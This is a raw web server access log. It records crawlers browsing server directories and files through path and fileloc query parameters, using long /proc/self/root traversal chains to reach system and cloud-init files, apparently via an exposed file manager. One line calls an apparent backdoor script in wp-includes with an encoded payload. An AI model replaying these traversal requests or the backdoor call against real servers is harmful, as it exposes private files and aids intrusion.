74.7.241.31 - - [18/Mar/2026:00:29:57 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/pxp-agent/spool HTTP/1.1" 200 17216 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/pxp-agent" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:58 -0300] "GET /?fileloc=%2F%2Fbin%2Fpwmake&path=%2F%2Fbin HTTP/1.1" 200 12720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:57 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2FSimplePie%2Fsrc HTTP/1.1" 200 60029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:58 -0300] "GET /?fileloc=%2F%2Fbin%2Fcloud-run-instances&path=%2F%2Fbin HTTP/1.1" 200 41046 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:58 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/zones HTTP/1.1" 200 37626 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:29:58 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run/faillock HTTP/1.1" 200 16721 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:29:59 -0300] "GET /?fileloc=%2F%2Fbin%2Feuform-get-template&path=%2F%2Fbin HTTP/1.1" 200 12906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.191 - - [18/Mar/2026:00:29:59 -0300] "GET /?path=%2F%2Fetc%2Fyum.repos.d HTTP/1.1" 403 74371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.128 - - [18/Mar/2026:00:29:59 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/lib/initramfs HTTP/1.1" 200 16854 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:00 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/systemd/shutdown HTTP/1.1" 200 17614 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/systemd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:01 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/cwd/.tmb HTTP/1.1" 200 19268 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/cwd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:01 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware/mediatek HTTP/1.1" 200 51915 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:04 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm/termios.h&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm HTTP/1.1" 200 17475 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:05 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/tuned/powersave HTTP/1.1" 200 21910 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/tuned" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:05 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm/siginfo.h&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm HTTP/1.1" 200 17873 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/asm" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:06 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/puppet/modules HTTP/1.1" 200 17162 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/puppet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:30:06 -0300] "GET /?fileloc=%2Fhome%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fclass-wp-xmlrpc-server.php&path=%2Fhome%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 232632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:30:07 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware/edgeport HTTP/1.1" 200 28459 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:06 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd/system HTTP/1.1" 200 653529 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/systemd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:30:08 -0300] "GET /?fileloc=%2Fhome%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fclass-wp-block-parser.php&path=%2Fhome%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 24878 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.31 - - [18/Mar/2026:00:30:08 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/chrony HTTP/1.1" 200 17508 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:08 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/yum-plugins HTTP/1.1" 200 31295 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.191 - - [18/Mar/2026:00:30:09 -0300] "GET /?path=%2Fhome%2Fstorage%2F0%2Ffc%2F16%2Fbandeirantesbomb3%2Fpublic_html%2Fwp-includes%2Fblocks%2Floginout HTTP/1.1" 200 22285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.228.61 - - [18/Mar/2026:00:30:09 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.31 - - [18/Mar/2026:00:30:09 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/spool/postfix/maildrop HTTP/1.1" 200 17147 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/spool/postfix" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:10 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware/pcxhr HTTP/1.1" 200 65976 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:10 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/systemd/initctl HTTP/1.1" 200 17570 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/systemd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:11 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done/user-data.txt&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done HTTP/1.1" 200 17731 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:11 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/sys/kernel HTTP/1.1" 200 16815 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/sys" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:12 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done/user-data.txt.i&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done HTTP/1.1" 200 17733 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:12 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware/slicoss HTTP/1.1" 200 28248 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:13 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/helpers/sip.xml&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/helpers HTTP/1.1" 200 17810 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/helpers" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:13 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware/rockchip HTTP/1.1" 200 19770 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:14 -0300] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/zones/drop.xml&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/zones HTTP/1.1" 200 17910 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firewalld/zones" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
179.188.53.243 - - [18/Mar/2026:00:25:15 -0300] "GET /wp-includes/js/crop/crop/index.php?ARRAY=7o2230223n313737333830373931352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333830343331352q3233613139653532346236303030653366373738373861323339353761326138222p2232223n226163383530623966383661626535623466666439623632306136613266616630222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232362q34342q36302q36392q38302q38342q3233227q HTTP/1.1" 504 247 "-" "-"
74.7.241.31 - - [18/Mar/2026:00:30:14 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/systemd/generator.late HTTP/1.1" 200 33233 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/systemd" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:15 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done/sem HTTP/1.1" 200 83430 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/instances/done" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [18/Mar/2026:00:30:16 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/local/libexec HTTP/1.1" 200 16982 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/local" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [18/Mar/2026:00:30:16 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware/isci HTTP/1.1" 200 19863 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
